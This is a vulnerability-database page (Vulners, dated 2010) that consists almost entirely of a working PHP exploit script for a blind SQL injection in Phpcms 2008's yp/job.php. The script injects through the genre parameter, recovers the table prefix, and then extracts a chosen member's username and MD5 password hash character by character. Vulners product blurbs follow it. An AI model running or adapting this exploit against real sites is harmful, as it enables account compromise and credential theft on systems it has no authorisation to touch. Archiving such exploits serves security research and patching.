Vulners
Lucene search
Phpcms 2008 yp/job.php脚本SQL盲注漏洞
<?
ini_set("max_execution_time",0);
error_reporting(7);
if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;
function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." ".
"\n[+] Ex. : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}
function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);
$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);
fclose ($fp);
return $reply;
}
function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;
$chr = ord ($chr);
$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%2527", $query);
$outcode = request ($hostname, $path, $query);
preg_match ("/(.+)< \/span>/", $outcode, $x);
if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}
$query = "x%2527";
$outcode = request ($hostname, $path, $query);
preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);
$prefix=$match[1];
//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";
if ($match[1]) {
echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}
else {
die(" Exploit failed...");
}
echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%2527", $query);
$outcode = request ($hostname, $path, $query);
$i++;
preg_match ("/(.+)< \/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}
if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}
$length=$i-1;
echo "[+]length -> ".$length;
// return $length;
//}
echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";
while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
$pos = 9;
echo "\n[+]password(md5) -> ";
while ($pos < = 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2010 00:00Current
7.1High risk
Vulners AI Score7.1